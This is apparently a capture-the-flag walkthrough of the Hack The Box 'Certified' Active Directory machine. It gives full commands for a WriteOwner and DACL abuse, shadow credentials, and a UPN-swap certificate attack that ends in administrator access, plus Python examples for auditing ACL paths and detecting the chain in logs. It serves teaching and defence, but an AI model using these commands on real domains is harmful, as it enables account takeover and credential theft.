Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!

Initial Scenario

We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:

Username: judith.mader

Password: judith09

User Account: judith.mader (Low privilege)

Target: Escalate privileges to root on the machine.

Tools Utilized: nxc, bloodyAD, dacledit.py, pywhisker, Impacket scripts, and certipy.


Nmap Scan

An initial Nmap scan revealed several open ports on the domain controller (DC01):

53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP over SSL
3268/tcp  open  ldap          Microsoft Global Catalog
3269/tcp  open  ssl/ldap      Microsoft Global Catalog over SSL
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing

Key observations:

Active Directory Indicators: Ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) suggest the presence of a Windows domain controller.

SSL Certificates: The LDAPS certificate details revealed the hostname DC01.certified.htb and additional domain information, indicating that the domain controller also hosts a certificate authority.

SMB Signing: Nmap scripts indicated SMB signing is enabled and required, which may limit some SMB attack vectors.

Testing SMB Login

With the obtained credentials, SMB authentication was tested using nxc:

nxc smb $IP -u 'judith.mader' -p 'judith09'


SMB     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB     445    DC01             [+] certified.htb\judith.mader:judith09

The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.

LDAP Enumeration with BloodHound

To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:

nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server $IP


LDAP     389    DC01             [+] certified.htb\judith.mader:judith09
LDAP     389    DC01             Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group
LDAP     389    DC01             Done in 00M 33S
LDAP     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip

The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.

BloodHound Analysis

The BloodHound graph revealed several key attack paths within the Active Directory environment:

BloodHound graph of the Certified domain (image not reproduced here):

  1. Judith Mader's permissions: Judith Mader has WriteOwner permissions on the Management group.
  2. Service account (Management_SVC): a GenericWrite edge links the Management group and the Management_SVC account; step 5 of the escalation below (the KeyCredentialLink write on management_svc) relies on it.
  3. CA_Operator privilege: The Management_SVC account has GenericAll permissions over the CA_Operator user.
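The ACL chain the graph shows can be reproduced from collected data without the BloodHound UI, which is also how a defender audits a domain for takeover edges held by ordinary users. The following Python is an added example, not part of the walkthrough and not BloodHound's own code: it works on constructed, heavily simplified BloodHound-style objects (the real collector output identifies principals by SID and carries many more properties), builds a graph from takeover rights plus group membership, and breadth-first searches for a path from judith.mader to ca_operator. The object names, the `PRIVILEGED` set and the `TAKEOVER_RIGHTS` list are assumptions chosen to mirror the edges described above.

```python
from collections import deque

# Constructed, simplified BloodHound-style data (not real SharpHound/nxc output).
# Each object lists the ACEs granted to other principals over it; an ACE here
# means: `principal` holds `right` over the object named by the key.
OBJECTS = {
    "JUDITH.MADER@CERTIFIED.HTB": {"type": "User", "aces": []},
    "MANAGEMENT@CERTIFIED.HTB": {"type": "Group", "aces": [
        {"principal": "JUDITH.MADER@CERTIFIED.HTB", "right": "WriteOwner"},
    ]},
    "MANAGEMENT_SVC@CERTIFIED.HTB": {"type": "User", "aces": [
        {"principal": "MANAGEMENT@CERTIFIED.HTB", "right": "GenericWrite"},
    ]},
    "CA_OPERATOR@CERTIFIED.HTB": {"type": "User", "aces": [
        {"principal": "MANAGEMENT_SVC@CERTIFIED.HTB", "right": "GenericAll"},
    ]},
    "ADMINISTRATOR@CERTIFIED.HTB": {"type": "User", "aces": [
        {"principal": "DOMAIN ADMINS@CERTIFIED.HTB", "right": "GenericAll"},
    ]},
    "DOMAIN ADMINS@CERTIFIED.HTB": {"type": "Group", "aces": []},
}
# Group membership, group -> members (constructed).
MEMBERS = {"DOMAIN ADMINS@CERTIFIED.HTB": ["ADMINISTRATOR@CERTIFIED.HTB"]}

# Principals whose control over everything is expected (assumption);
# takeover rights granted to anyone else are worth reviewing.
PRIVILEGED = {"DOMAIN ADMINS@CERTIFIED.HTB"}

# Rights that let the holder take control of the object (BloodHound edge names).
TAKEOVER_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteOwner", "WriteDacl", "Owns",
    "AddMember", "ForceChangePassword", "AllExtendedRights",
}


def build_edges(objects, members):
    """Directed graph: holder -> (object, right) for takeover ACEs, plus
    member -> (group, "MemberOf") so a group's rights flow to its members."""
    edges = {}
    for target, obj in objects.items():
        for ace in obj["aces"]:
            if ace["right"] in TAKEOVER_RIGHTS:
                edges.setdefault(ace["principal"], []).append((target, ace["right"]))
    for group, names in members.items():
        for member in names:
            edges.setdefault(member, []).append((group, "MemberOf"))
    return edges


def find_path(edges, start, goal):
    """Breadth-first search; returns [(from, right, to), ...] or None."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for nxt, right in edges.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, right)
                queue.append(nxt)
    if goal not in prev:
        return None
    path, node = [], goal
    while prev[node] is not None:
        parent, right = prev[node]
        path.append((parent, right, node))
        node = parent
    return list(reversed(path))


def risky_aces(objects, privileged):
    """Takeover rights held by principals outside the expected admin set."""
    return [
        (ace["principal"], ace["right"], target)
        for target, obj in objects.items()
        for ace in obj["aces"]
        if ace["right"] in TAKEOVER_RIGHTS and ace["principal"] not in privileged
    ]


if __name__ == "__main__":
    edges = build_edges(OBJECTS, MEMBERS)
    for hop in find_path(edges, "JUDITH.MADER@CERTIFIED.HTB", "CA_OPERATOR@CERTIFIED.HTB"):
        print("%s -[%s]-> %s" % hop)
    print("ACL path to administrator:",
          find_path(edges, "JUDITH.MADER@CERTIFIED.HTB", "ADMINISTRATOR@CERTIFIED.HTB"))
    for finding in risky_aces(OBJECTS, PRIVILEGED):
        print("review:", *finding)
```

On this data the search returns the three-hop path WriteOwner, GenericWrite, GenericAll ending at ca_operator, and no ACL path at all to administrator: the last hop of the walkthrough goes through certificate services rather than through an ACE, which is why an ACL-only audit would not flag it and why the CA configuration needs its own review.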

User Privilege Escalation

1. Data Collection with nxc

  • Action: Enumerated Active Directory data and found that judith.mader could modify the “Management” group.
  • Details: Used BloodHound to analyze the data collected by nxc.
2. Setting Ownership

Used bloodyAD to set judith.mader as the owner of the “Management” group:

bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

3. Granting Write Permissions

Updated the group permissions with dacledit.py:

python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'

4. Adding to Management Group

Added judith.mader to the “Management” group:

bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"

5. Exploiting KeyCredentialLink

Used pywhisker to create a certificate for management_svc:

python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add

6. Obtaining a TGT

Generated a Kerberos TGT for management_svc:

python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache

7. Recovering NT Hash

Extracted the NT hash for management_svc with getnthash.py, using the TGT saved above and the AS-REP encryption key printed by gettgtpkinit.py:

KRB5CCNAME=fuck.ccache python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX

8. Logging in with Evil-WinRM

Logged in as management_svc with Evil-WinRM:

evil-winrm -i $IP -u management_svc -H $NT_HASH   # NT hash recovered in step 7

Root Privilege Escalation

1. Identifying GenericAll Rights

Discovered that management_svc had GenericAll rights over ca_operator.

2. Adding KeyCredential

Used certipy-ad in shadow-credentials mode to add a KeyCredential to ca_operator and recover its NT hash:

certipy-ad shadow auto -u management_svc@certified.htb -hashes $NT_HASH -account ca_operator

3. Updating UPN of ca_operator

Updated the UPN (UserPrincipalName) of ca_operator to administrator:

certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn administrator

4. Requesting Administrator Certificate

Requested a certificate for the administrator account using certipy-ad:

certipy-ad req -username ca_operator@certified.htb -hashes $CA_OPERATOR_NT_HASH -ca certified-DC01-CA -template CertifiedAuthentication   # ca_operator's hash from step 2; the UPN now reads administrator

5. Restoring Original UPN

Restored ca_operator’s UPN to its original value:

certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn ca_operator@certified.htb

6. Obtaining Administrator TGT

Authenticated as administrator with the new certificate; certipy-ad prints the TGT and, with it, the administrator NT hash used in the next step:

certipy-ad auth -pfx administrator.pfx -domain certified.htb

7. Logging in as Administrator

Logged in with Evil-WinRM as administrator:

evil-winrm -u administrator -H $ADMIN_NT_HASH -i $IP   # NT hash returned by certipy-ad auth in step 6
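Every hop in the two escalation sections leaves a directory change behind: the owner and DACL rewrite on Management, judith.mader adding herself to the group, the msDS-KeyCredentialLink writes on management_svc and ca_operator, the UPN swap to administrator, the certificate issued under that borrowed name, and the UPN being put back. The following Python is an added example (not from the walkthrough or from any of the tools it uses) that runs a small rule set over constructed records modelled on Windows Security events 5136 (directory object modified) and 4887 (certificate issued). The record shape, the field names `subject`, `object`, `attr`, `value`, `requester` and `cert_identity`, and the `ACCOUNTS` set are all assumptions made for the example; real events identify objects by DN and GUID, carry many more fields, and log a value replacement as a delete followed by an add.

```python
from collections import defaultdict

# Constructed, simplified records modelled on Windows Security events
# 5136 (Directory Service Changes) and 4887 (Certificate Services issued a
# certificate). Only the fields the rules below need are kept, and only the
# new attribute value is recorded. The sequence mirrors the walkthrough.
EVENTS = [
    {"id": 5136, "seq": 1, "subject": "judith.mader", "object": "Management",
     "attr": "nTSecurityDescriptor", "value": "O:S-1-5-21-...-1103D:(A;;...)"},
    {"id": 5136, "seq": 2, "subject": "judith.mader", "object": "Management",
     "attr": "member", "value": "judith.mader"},
    {"id": 5136, "seq": 3, "subject": "judith.mader", "object": "management_svc",
     "attr": "msDS-KeyCredentialLink", "value": "B:828:0002000020000100..."},
    {"id": 5136, "seq": 4, "subject": "management_svc", "object": "ca_operator",
     "attr": "msDS-KeyCredentialLink", "value": "B:828:0002000020000100..."},
    {"id": 5136, "seq": 5, "subject": "management_svc", "object": "ca_operator",
     "attr": "userPrincipalName", "value": "administrator"},
    {"id": 4887, "seq": 6, "requester": "ca_operator",
     "cert_identity": "administrator", "template": "CertifiedAuthentication"},
    {"id": 5136, "seq": 7, "subject": "management_svc", "object": "ca_operator",
     "attr": "userPrincipalName", "value": "ca_operator@certified.htb"},
    {"id": 5136, "seq": 8, "subject": "administrator", "object": "ca_operator",
     "attr": "description", "value": "CA operator"},   # benign change
]

# sAMAccountNames known to the directory (constructed); used to spot a UPN
# whose local part collides with a different account.
ACCOUNTS = {"administrator", "judith.mader", "management_svc", "ca_operator"}


def detect(events, accounts):
    """Return (rule, actor, target, seq) findings in event order."""
    findings = []
    dacl_writers = defaultdict(set)   # group -> subjects that rewrote its SD
    borrowed_upn = {}                 # account -> (borrowed name, seq)
    for e in sorted(events, key=lambda ev: ev["seq"]):
        if e["id"] == 5136:
            subj, obj, attr = e["subject"], e["object"], e["attr"]
            if attr == "nTSecurityDescriptor":
                # Owner/DACL rewrite: unremarkable alone, kept for correlation
                dacl_writers[obj].add(subj)
            elif attr == "member":
                # The principal that just rewrote the group's SD adds itself
                if e["value"] == subj and subj in dacl_writers[obj]:
                    findings.append(("dacl-then-self-add", subj, obj, e["seq"]))
            elif attr == "msDS-KeyCredentialLink":
                # Key trust written onto someone else's account
                if subj != obj:
                    findings.append(("shadow-credential", subj, obj, e["seq"]))
            elif attr == "userPrincipalName":
                local = e["value"].split("@", 1)[0].lower()
                if local != obj.lower() and local in accounts:
                    # UPN now names a different existing account
                    borrowed_upn[obj] = (local, e["seq"])
                    findings.append(("upn-collision", subj, obj, e["seq"]))
                elif obj in borrowed_upn:
                    findings.append(("upn-restored", subj, obj, e["seq"]))
                    del borrowed_upn[obj]
        elif e["id"] == 4887:
            # Certificate issued while the requester's UPN names another account
            borrowed = borrowed_upn.get(e["requester"])
            if borrowed and borrowed[0] == e["cert_identity"].lower():
                findings.append(("cert-under-borrowed-upn", e["requester"],
                                 e["cert_identity"], e["seq"]))
    return findings


if __name__ == "__main__":
    for rule, actor, target, seq in detect(EVENTS, ACCOUNTS):
        print("seq %d: %-24s %s -> %s" % (seq, rule, actor, target))
```

The rules are deliberately stateful: a DACL rewrite or a UPN change is ordinary administration on its own, and only the pairing (rewrite followed by a self-add, a collision followed by a certificate request and a revert) separates this chain from routine work. Event 5136 is only produced when "Audit Directory Service Changes" is enabled and the objects carry an audit SACL, so check that coverage exists for groups and for the msDS-KeyCredentialLink and userPrincipalName attributes before relying on rules like these.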

Key Steps:
  • Abused AD misconfigurations to escalate privileges.
  • Exploited certificate services to gain access to the administrator account.

Result: Full compromise of the Certified machine.

